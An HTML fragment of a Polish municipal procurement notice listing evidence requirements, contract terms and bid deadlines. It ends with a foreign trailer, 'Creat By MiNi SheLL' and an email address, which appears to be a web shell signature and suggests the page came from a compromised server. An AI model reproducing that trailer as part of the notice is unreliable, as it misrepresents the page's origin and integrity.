ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji <br/>i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 4 do SWZ;<br/>b)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>5.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w ust. 4 pkt 1 lit. b, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące ich złożeniem .<br/>6.	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, <br/>o których mowa w ust. 4 pkt 1 lit. b, zastępuje się je w całości dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy . Termin, o którym mowa w ust. 5 stosuje się odpowiednio.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> a.	w przypadku zaoferowania materiałów równoważnych Wykonawca winien do oferty dołączyć przedmiotowe środki dowodowe na potwierdzenie równoważności oraz zaznaczyć te pozycje w formularzach asortymentowo-cenowych - zał. nr 2A – 2H do SWZ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> a.	w przypadku zaoferowania materiałów równoważnych Wykonawca winien do oferty dołączyć przedmiotowe środki dowodowe na potwierdzenie równoważności oraz zaznaczyć te pozycje w formularzach asortymentowo-cenowych - zał. nr 2A – 2H do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiany umowy wymagają formy pisemnej pod rygorem nieważności i nie mogą naruszać postanowień zawartych w art. 454 i 455 ustawy pzp.<br/>2. Ze względu na ograniczona ilość znaków w polu zamawiający informuję, że szczegółowy rodzaj i zakres zmian umowy został opisany w SWZ w załączniku nr 5 projekt wzór umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://umilawa.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-17 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-15</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <p class="mb-0">Część 7 : <span class="normal">Tak</span></p> <p class="mb-0">Część 8 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com